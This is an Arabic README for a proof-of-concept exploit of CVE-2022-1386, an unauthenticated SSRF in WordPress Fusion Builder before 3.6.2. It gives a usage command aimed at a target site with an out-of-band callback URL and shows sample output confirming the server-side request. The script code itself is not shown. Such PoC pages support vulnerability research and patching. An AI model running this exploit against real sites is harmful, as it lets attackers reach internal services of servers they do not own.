
إثبات مفهوم SSRF بدون مصادقة في WordPress Fusion Builder <3.6.2 (CVE-2022-1386)
ثغرة تزوير الطلبات من جانب الخادم (SSRF) غير مصادق عليها في إضافة Fusion Builder (المستخدمة في قالب Avada لـ WordPress) قبل الإصدار 3.6.2.
تسمح للمهاجمين بإرسال طلبات HTTP إلى عناوين URL عشوائية، مما قد يستهدف الخدمات الداخلية.
admin-ajax.phppython3 exploit_cve_2022_1386.py <target_url> <your_callback_url>
مثال:
python3 exploit_cve_2022_1386.py https://vulnerable.site https://abc123.oast.fun
استخدم Interact.sh أو [Burp Collaborator] لتلقي الاستدعاء.
📋 نموذج الإخراج
[*] Fetching nonce from target...
[*] Sending SSRF payload to https://abc123.oast.fun...
[+] SSRF confirmed: received callback from victim server.
📌 ملاحظات يتجنب إثبات المفهوم هذا تسريب البيانات. الاستخدام الأخلاقي فقط: لا تستغل الأنظمة دون إذن.
📚 المراجع https://wpscan.com/vulnerability/bf7034ab-24c4-461f-a709-3f73988b536b https://theme-fusion.com/documentation/avada/fusion-builder-changelog/